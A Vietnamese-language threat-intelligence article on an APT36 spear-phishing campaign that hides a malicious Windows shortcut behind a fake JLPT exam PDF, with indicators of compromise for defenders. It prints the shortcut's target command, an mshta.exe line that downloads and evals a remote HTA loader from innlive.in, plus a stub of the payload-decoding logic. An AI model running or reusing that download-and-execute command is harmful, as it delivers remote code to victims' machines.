Nguy hiểm: APT36 triển khai tấn công mạng mới tinh vi qua LNK

APT36, còn được biết đến với tên gọi Transparent Tribe, đã triển khai một chiến dịch tấn công mạng mới và tinh vi. Chiến dịch này nhắm mục tiêu vào các thực thể chính phủ và tổ chức chiến lược, khai thác triệt để các tệp tin phím tắt Windows LNK độc hại để xâm nhập hệ thống. Đây là một mối đe dọa mạng đáng chú ý, cho thấy sự phát triển trong các kỹ thuật lừa đảo và thực thi mã độc.

Chiến dịch Tấn công Mạng Mới của APT36

Kỹ thuật Spear-Phishing và Tệp LNK độc hại

Cuộc tấn công mạng khởi đầu bằng các email spear-phishing được thiết kế đặc biệt, nhằm vào các mục tiêu cụ thể.

Những email này chứa một tệp lưu trữ ZIP với tên “Online JLPT Exam Dec 2025.zip”.

Chủ đề liên quan đến thông báo thi cử được sử dụng làm mồi nhử hiệu quả, khuyến khích các cá nhân mục tiêu mở tệp đính kèm.

Sau khi tệp ZIP được giải nén, người dùng sẽ thấy một tệp tin dường như là tài liệu PDF thông thường, có tên “Online JLPT Exam Dec 2025.pdf”.

Tuy nhiên, tệp tin này thực chất là một tệp tin phím tắt Windows (LNK file) được ngụy trang cẩn thận.

Ngụy trang LNK: Kích thước và Cấu trúc Giả mạo

Tệp phím tắt độc hại này sử dụng kỹ thuật mở rộng kép, xuất hiện dưới dạng .pdf.lnk.

Hệ điều hành Windows mặc định ẩn phần mở rộng .lnk, khiến ngay cả những người dùng có thói quen xem phần mở rộng tệp tin cũng chỉ nhìn thấy nó là một tệp PDF.

Một điểm đáng chú ý khác là kích thước tệp tin. Tệp LNK này có dung lượng lớn hơn 2 MB, điều này là bất thường đối với một tệp phím tắt đơn thuần và gần bằng kích thước của một tệp PDF thực sự.

Các nhà phân tích từ Cyfirma đã xác định rằng phần kích thước tăng thêm này đến từ việc nhúng một cấu trúc PDF hoàn chỉnh và nhiều hình ảnh vào bên trong tệp LNK.

Kỹ thuật này giúp tệp tin trở nên cực kỳ thuyết phục, khó phân biệt với một tài liệu hợp pháp. Nguồn nghiên cứu chi tiết có thể được tham khảo tại báo cáo của Cyfirma.

Chuỗi Lây nhiễm và Thực thi Mã độc

Khai thác mshta.exe và HTA Script cho Remote Code Execution

Khi nạn nhân mở tệp phím tắt PDF giả mạo, Windows không mở tài liệu như mong đợi.

Thay vào đó, hệ thống sẽ thực thi công cụ hợp pháp mshta.exe từ thư mục System32.

mshta.exe được truyền một script HTA từ xa làm đối số, cho phép remote code execution.

Phân tích từ Cyfirma cho thấy đường dẫn mục tiêu trong tệp phím tắt gọi một trình tải (loader) từ xa tại innlive.in.

Cụ thể, target path có dạng tương tự như sau:

C:\Windows\System32\mshta.exe "javascript:var u='http://innlive.in/loader.hta';var x=new ActiveXObject('Microsoft.XMLHTTP');x.open('GET',u,false);x.send();eval(x.responseText);"

Lệnh này sẽ tải và thực thi script HTA từ địa chỉ URL được chỉ định.

Giải mã Payload và Tải RAT vào Bộ nhớ

Script HTA được tải về sẽ chạy trong một cửa sổ ẩn, thu nhỏ khung trình duyệt về kích thước zero.

Sau đó, nó sử dụng các thuật toán giải mã tùy chỉnh Base64 và XOR để giải mã hai khối payload chính trong bộ nhớ.

Hai khối này được đặt tên là ReadOnly và WriteOnly, chứa các thành phần độc hại được mã hóa.

Mẫu logic JavaScript minh họa cho quá trình giải mã này:

function decode(encodedStr) { // Custom Base64 and XOR decoding logic // ... (logic để giải mã dữ liệu) return decodedData;}var payloadReadOnly = decode("encoded_data_for_readonly");var payloadWriteOnly = decode("encoded_data_for_writeonly");// ... (logic tải và thực thi payload đã giải mã)

Payload ReadOnly được thiết kế để làm suy yếu các kiểm tra bảo mật .NET và thiết lập môi trường runtime cần thiết cho mã độc.

Payload WriteOnly có nhiệm vụ tải một DLL mã hóa trực tiếp vào bộ nhớ dưới dạng một Remote Access Trojan (RAT).

RAT này cung cấp cho kẻ tấn công các tính năng điều khiển từ xa, bao gồm khả năng chiếm quyền điều khiển hệ thống, đánh cắp dữ liệu và giám sát hoạt động của nạn nhân.

Một thư mục ẩn “usb” cùng với tệp usbsyn.pim có thể chứa dữ liệu mã hóa bổ sung, phục vụ cho các giai đoạn tấn công tiếp theo hoặc duy trì quyền truy cập.

Kỹ thuật Tránh né Phát hiện và Duy trì Quyền Kiểm soát

Mã độc RAT được tải hoàn toàn trong bộ nhớ, không ghi tệp tin lên ổ đĩa, giúp tránh các biện pháp phát hiện dựa trên chữ ký tệp.

Nó sử dụng các công cụ Windows đáng tin cậy (LOLBINs) để thực hiện các chức năng độc hại, hòa lẫn vào các tiến trình hệ thống hợp pháp.

Thông tin liên lạc với máy chủ C2 (Command-and-Control) được thực hiện qua các kênh mã hóa, gây khó khăn cho việc phân tích lưu lượng mạng và phát hiện xâm nhập.

Để trấn an người dùng và che giấu sự xâm nhập, script HTA sẽ tìm nạp và mở một tệp PDF kỳ thi JLPT thật sự.

Điều này khiến toàn bộ chuỗi sự kiện trông giống như một hoạt động xem tài liệu bình thường, trong khi hệ thống đã bị chiếm quyền điều khiển hoàn toàn.

Chỉ số Xâm nhập (IOCs) của Chiến dịch APT36

Các chỉ số xâm nhập liên quan đến chiến dịch tấn công mạng này rất quan trọng để các tổ chức có thể chủ động phòng vệ:

• Tên tệp lưu trữ độc hại: Online JLPT Exam Dec 2025.zip
• Tên tệp tin phím tắt giả mạo: Online JLPT Exam Dec 2025.pdf (thực chất là tệp LNK)
• URL/Domain máy chủ tải mã độc: innlive.in

Việc tích hợp các IOC này vào hệ thống bảo mật có thể giúp tăng cường khả năng phát hiện xâm nhập và giảm thiểu rủi ro từ mối đe dọa mạng này.